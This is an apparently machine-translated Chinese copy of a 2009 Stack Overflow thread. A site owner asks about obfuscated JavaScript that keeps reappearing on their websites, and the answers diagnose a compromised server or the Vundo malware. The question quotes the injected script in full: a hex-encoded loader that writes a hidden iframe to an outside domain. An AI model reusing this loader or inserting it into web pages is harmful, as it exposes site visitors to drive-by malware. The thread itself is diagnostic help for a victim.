Javascript“病毒”
我的所有网站上都有一些JS“病毒”的问题。它们位于不同的主机上,在其中一些主机上出现了以下代码。
<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
var i49d9f1a846737 = 16;
return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
var i49d9f1a848679 = 2;
var i49d9f1a847da9 = '';
i49d9f1a848e47 = String.fromCharCode;
for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
}
return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>NOD32封锁了网站,因为他相信有病毒。从源代码中删除代码没有帮助,因为它再次出现。它不可能是XSS的结果,因为它甚至出现在静态网站上。
我试着对我的系统做了全面的扫描,但没有帮助。所有网站上唯一的一件事就是谷歌分析,我认为这是不可能的。
编辑:您可以在http://www.postuj.cz/test/或http://flavicius.php5.cz/上看到它。
回答 2
Stack Overflow用户
发布于 2009-04-06 17:05:01
它们位于不同的主机上,在其中一些主机上出现了以下代码。
每个主机的代码都是一样的吗?您能给出一个受影响域的例子吗?这样我们就可以检查代码是否存在于服务器端,而不仅仅是在您的机器上(这通常是不太可能的)。
你发布的代码肯定很可疑。一旦解码,它就会向http://ecom.rarebreedfootwear.com/?写入一个iframe (它试图向该URL添加一个cachebuster随机数,但由于一个错误而失败)。
该地址没有明显的爆炸性,可能最终的目标漏洞还没有到位,或者只是对以后的真正攻击进行测试,但是在您的站点上出现一个意外的JavaScript,它会对自己进行解码并添加一个iframe,这是一个巨大的危险信号。通常这意味着您的服务器已经被破坏,需要重新安装从零开始使用新的密码。
预计到达时间:
例如,您可以在hxxp://acuicius.php5.cz/上看到它。
谢谢。我删除了这条评论以隐藏工作URL,因为它实际上已经被感染了。无论是在应用程序级别还是Apache本身都不清楚,但是每个页面的底部都有可疑的脚本。
因此,至少应用程序和可以想象的服务器受到了破坏,因此应该将其断开,以便进行清理、重新安装和诊断:您需要了解攻击者是如何进入的,这样就不会再次发生这种情况。首先,请检查WordPress的最新版本,因为它在过去曾遭受过许多安全漏洞。
Stack Overflow用户
发布于 2009-04-06 14:46:51
它看起来像文多或者它的一个变体。该恶意软件倾向于将看似毫无意义的javascript插入到站点(在您的端,而不是服务器端)。我建议试试Malware字节的反恶意软件。安装它,更新它,并做一个完整的扫描。如果失败了,也许可以尝试研究具体删除Vundo的选项。
https://stackoverflow.com/questions/721772
复制相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号